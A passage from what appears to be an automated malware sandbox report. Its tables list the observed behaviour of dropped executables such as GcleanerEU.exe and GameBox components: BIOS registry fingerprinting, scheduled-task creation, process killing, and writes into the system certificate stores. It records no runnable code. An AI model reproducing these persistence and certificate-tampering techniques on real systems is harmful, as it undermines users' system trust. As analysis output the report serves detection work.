| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\Documents\SVzPjmmtaOBGm0pqcQuZdnkT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\Documents\SVzPjmmtaOBGm0pqcQuZdnkT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{8E26A34E-7831-44E6-9250-220C710C4C96} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee